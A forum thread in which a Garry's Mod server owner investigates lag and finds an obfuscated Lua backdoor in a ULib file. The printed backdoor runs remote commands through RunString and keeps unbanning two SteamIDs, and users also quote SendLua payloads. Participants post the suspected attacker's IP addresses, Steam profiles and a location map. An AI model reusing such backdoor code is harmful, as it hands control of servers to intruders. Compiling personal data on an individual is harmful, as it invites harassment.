My main server has been having a very bad connection with 900+ ping. If I start the server on another IP address or port number, it runs fine. When looking at Netlimiter, the server has an unusual number of outgoing and incoming connections compared to my other servers, despite being empty. None of my other servers have this issue. It seems like this may be some kind of malformed packet attack, but I really have no idea. I was wondering if anybody had any suggestions.
Wireshark save:
[URL]http://216.245.193.98/xmisc/attackissue.pcap[/URL]
Note: The server having the issue is 216.245.193.98:27015
Here is a Wireshark txt output:
[URL]http://216.245.193.98/xmisc/oddissue2[/URL]
In particular there are a lot of packets coming from 96.43.138.109, but I really do not know if that is the cause. They are going to 216.245.193.98:27015 however, which is the address of my server.
It's definitely some sort issue with the port, like an attack. If I host my server on another IP it works fine. If I host another server at this IP, it has the same issue.
Note sure if this is a coincidence or not, but here's what happened. I used IPSec to block the IP address, 96.43.138.109 and the lag stopped instantly. Afterwards, I have an odd issue where the server crashes and restarts at exact intervals of about 30 seconds. The server console is also getting spammed with "removeid" commands of two SteamIDs that are known exploiters that have somehow uploaded Lua files to the server before.
After a while, the crashing stopped and the server ran stable for a while. Soon the huge lag begins again. I do a Wireshark capture and an abnormal amount of packets is comign from 96.43.138.124 (notice how close it is to the other IP). I block that IP and the lag instantly stopped. The removeids are still being spammed. I have already confirmed that rcon is secure, and I'm working on doing batch searches for any uploaded lua that is spamming the unban.
[editline]19th May 2011[/editline]
I foudn this in addons/ulib/init.lua at the very bottom:
[lua]local r = _G["R".."u".."n".."Str".."ing"] local c = _G["co".."nco".."mman".."d"] local a = "A".."dd" local s = "i".."i" c[a](s, function(m, n, o) r(o[1]) end)
local s1 = "STE".."AM_0:".."1:1767".."2340" local s2 = "STEA".."M_0:".."1:548".."998".."8" local ub = "un".."b".."an"
timer.Create("Spy sappin mah code", 5, 0, function() if (ULib && ULib[ub]) then ULib[ub](s1) ULib[ub](s2) end end)[/lua]
I don't know how they're uploading. I'm really lucky my batch search just happened to be the first 4 digits of their Steamid, seeing as to how they've obfuscated it.
lol, obfusication, that guy needs to work on it, its pretty obvious when you look at it
[QUOTE=CmdrMatthew;29935505]lol, obfusication, that guy needs to work on it, its pretty obvious when you look at it[/QUOTE]
It's not obfuscation, it's probably so you can't just use find in files on RunString/concommand/SteamIDs.
Considering there is an exploit out there where you can upload lua, I'd say that this is a real issue. I've had to delete random RunString functions and stuff several times now.
Other ways of obfuscation I've seen include String.char, and of course using the _G table is useful.
Do you have sv_allowupload 0?
Yes, I do
[code]sv_allowupload 0
sv_allowdownload 0[/code]
Rcon password has been changed several times as well, so that's not the issue either.
Do you have any binary modules installed that allow file reading/writing? Check the lua/includes/modules/ folder.
No, I actually made sure of this since the beginning. The only .dll module is gm_sqlite.
How big is it (kb)?
They have access to your FTP/Control Panel/RDP account.
gm_sqlite.dll is 464,384 bytes. I'm currently locking down my server by hardcoding bans against the attackers using gmsv_gatekeeper, however that obviously don't mitigate the fact that it is possible to upload lua files to my server.
[editline]19th May 2011[/editline]
[QUOTE=FlapadarV2;29935751]They have access to your FTP/Control Panel/RDP account.[/QUOTE]
My FTP logs show many attempts, but no one has been using it other than me. I have no control panel. My Event Viewer logs show a ton of attempted logins, but the only logins are by me, and since I have school during a certain time period I'm sure it's me. So I am positive the remote desktop is compromised. Besides, in the unlikely event remote desktop was compromised, I'm sure they would do more damage than toy around with one out of many gameservers and websites.
So I don't see why you're so sure the server is compromised at that level, I'm not a complete newbie at managing a dedicated server.
If they had RDP access, they could just go into the console and unban instead of putting it into a Lua script...
If they had FTP they could just remove their ID from the ban file...
:rolleyes:
[QUOTE=silverblu;29935973]If they had RDP access, they could just go into the console and unban instead of putting it into a Lua script...
If they had FTP they could just remove their ID from the ban file...
:rolleyes:[/QUOTE]
They might be lazy. There's no way without a binary module that they could edit ulib's init file. The file upload exploit only worked for creating files, not updating them..
[QUOTE=infinitywrai;29935768]So I don't see why you're so sure the server is compromised at that level, I'm not a complete newbie at managing a dedicated server.[/QUOTE]
It's the only real logical solution.
I've been in an email conversation with the person before and they vaguely mention some "attack vector" but then they stopped responding to my emails after I offered money in return for it...
I see where you're coming from but unfortunately I don't see any evidence of those vectors being vulnerable.
Out of curiousity, who was it? Would you mind telling me the email/steamid/ip?
[QUOTE=silverblu;29936365]Out of curiousity, who was it? Would you mind telling me the email/steamid/ip?[/QUOTE]
I would assume STEAM_0:1:5489988 and STEAM_0:1:17672340.
If they got access to your FTP, you can only assume they are smart enough to purge the logs of their entry....
The logs are not stored anywhere except in RAM, it is not possible to clear them through FTP.
The attacker is likely somewhere in Philadelphia based on IP traces of several of their IPs. They change their name often and has 2-3 or more Steam accounts. That's about all I know. The email they contact me with is a throwaway they made so I won't bother sharing it.
I am a staff member on this server, another of us made a thread about this but failed to provide sufficient information. I have a good collection of his information here.
[url]http://www.facepunch.com/threads/1084549-Big-time-Garrysmod-server-hacker-!?p=29551223&highlight=#post29551223[/url]
It appears he changed the url on one of his steam accounts, and his primary one at that.
He goes by the name of "Broguydudemanperson."
Your "info" is far from exact.
But it is still info, and all of it that any of us have at that.
Can't blame me for trying.
Don't read Fantah's post. Read the one by me that is a bit further down.
Better yet, let me paste it all here.
[quote]
[url]http://whatismyipaddress.com/ip/98.235.1.178[/url]
[url]http://whatismyipaddress.com/ip/174.55.7.226[/url]
[url]http://whatismyipaddress.com/ip/174.60.64.156[/url]
An example of an LUA code he was able to distribute to a client:
Code:
SendLua: __page_ = "http://www.lemonparty.org/"
SendLua: if (__html_) then __html_:Remove() end __html_ = vgui.Create('HTML') __html_:SetPos(0, 0) __html_:SetSize(ScrW(), ScrH()) __html_:OpenURL(__page_)
I
Multiple steam accounts that he uses:
[url]http://steamcommunity.com/id/personguybroman/[/url]
[url]http://steamcommunity.com/id/dickfondler/[/url]
[url]http://steamcommunity.com/id/timek33per/[/url]
Additional information:
[url]http://pastebin.com/MBb3qC47[/url]
We have this guy completely identified, and yet we can do absolutely nothing about it. This is ridiculous.
[/quote]
Three IP addresses and 2 STEAM accounts far from exact? Don't know what you consider exact then.
Location: East Berlin, Pennsylvania.
Exact location: [url]http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=39.937597+-76.978589&sll=37.0625,-95.677068&sspn=43.307813,60.908203&ie=UTF8&t=h&z=16[/url]
Just saying, he could be anywhere within 300 miles of that. It's only exact when you don't rely on whois.
[editline].[/editline]
As in, you can phone up the kids' mum exact. Fun to do.
You're right, Flapadar, all we know is he resides somewhere in Pennsylvania based on the IP traces. They've all been in various cities within that state. I've stopped recording his IP addresses as of late because they switch every time.
Don't get the impression that we actually want to go after this individual specifically, seeing as to how that wouldn't fix that exploit.
It isn't the physical locations that matter.
Well, not entirely.
They are IP addresses after all and each one of them link to the same address.
I can confirm that this is him.
[QUOTE=Banjoquard;29936822]Three IP addresses and 2 STEAM accounts far from exact? Don't know what you consider exact then.[/QUOTE]
PM'd you with a short explanation. I still doubt this is an exploit, and if it is, it seems targetted at ULX.
I've already told why RDP and FTP aren't compromised, I'm leaning on the fact that it's an exploit of some sort. (Could be ULX targetted, but don't see how that would allow them the ability to write to lua files) Keep in mind that in the past, the attacker has written to gamemodes, lua/autorun, and even lua/includes/glon.lua
-snip- forget that, definitely wrong.
Sorry, you need to Log In to post a reply to this thread.
